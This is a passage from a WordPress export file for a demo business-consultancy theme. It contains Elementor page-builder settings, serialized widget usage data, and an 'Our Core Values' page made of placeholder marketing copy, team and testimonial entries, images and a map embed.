new.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a428896","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"lbar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"},{"id":"2c76de7","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"lbar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"},{"id":"2e8f3f7","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"lbar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"d0493f4","elType":"section","settings":{"background_background":"classic","background_color":"#30344D","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"bfd67a8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"829ba7d","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom"},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false},{"id":"0308eae","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-about-us.jpg","id":520},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"175","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"12b16f2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"61fb36b","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e5ca1cb","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"4431150","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"e15f0b3","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"dc4d425","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bec6367","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"324dce4","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2580},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2580},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"e76f400","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"beac444","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"eab9ff6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7fb7005","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"b8f3d6d","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"532ec06","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"f9af862","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"0e38994","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"9a95313","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"0b610b3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2828095","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c25c0ad","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f09ab14","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"ec58039","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e65282d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"13da770","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f627004","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"35690a4","elType":"widget","settings":{"align":"center","text":"Explore More ","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-team","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:13:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:2;s:12:"align_tablet";i:1;s:12:"align_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}s:8:"advanced";a:2:{s:14:"_section_style";a:5:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}s:15:"_section_border";a:2:{s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:27;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:27;s:19:"_inline_size_tablet";i:21;s:19:"_inline_size_mobile";i:4;}}s:5:"style";a:1:{s:14:"section_border";a:4:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:19:"border_width_mobile";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:6:"margin";i:2;s:13:"margin_mobile";i:1;s:13:"margin_tablet";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:5;s:5:"title";i:5;s:11:"header_size";i:5;s:5:"align";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:5;s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:6:{s:9:"stitle_bg";i:5;s:28:"stitle_typography_typography";i:5;s:27:"stitle_typography_font_size";i:5;s:29:"stitle_typography_font_weight";i:5;s:12:"stitle_color";i:5;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:7:{s:10:"text_color";i:2;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;s:5:"align";i:3;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:2:{s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:12;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:8;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:10;s:14:"padding_mobile";i:6;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:2;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:16:"background_color";i:1;s:15:"background_size";i:2;}}}}s:8:"icounter";a:3:{s:5:"count";i:4;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:6:"number";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:11:{s:28:"number_typography_typography";i:4;s:34:"number_typography_font_size_mobile";i:4;s:18:"title_space_mobile";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:29:"number_typography_font_family";i:4;s:27:"number_typography_font_size";i:4;s:29:"number_typography_font_weight";i:4;s:28:"title_typography_font_family";i:4;s:28:"title_typography_font_weight";i:4;s:28:"title_typography_line_height";i:4;}}}}s:13:"iiboxcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"image_boxes";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:6:"box_bg";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:10:"lbar_color";i:3;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:2:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:4;s:11:"member_name";i:3;s:12:"member_extra";i:3;s:12:"social_share";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:10:"info_style";a:4:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:24:"job_typography_font_size";i:3;s:28:"title_typography_font_weight";i:4;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Core Values</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-core-values/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=529</guid>
		<description></description>
		<content:encoded><![CDATA[what we offer	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them.</p>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
	        the language of business	        <h3>Consultancy That Empowers You</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<a href="#our-philo">our philosophy</a>
				<a href="#our-mission">our mission</a>
				<a href="#our-vision">our vision</a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image1-value-1-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Philosophy</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg 750w, https://maxbizz.s3.amazonaws.com/images/our-vision-1-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Mission</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img width="750" height="660" src="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image2-home1-1-300x264.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Vision</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				Exceptional Client Service 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Great Team and Winning Culture 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Commitment to Integrity, Fairness 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
											<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Mary Grey</h6>							Manager						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Samanta Fox</h6>							Designer						
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>529</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-core-values]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
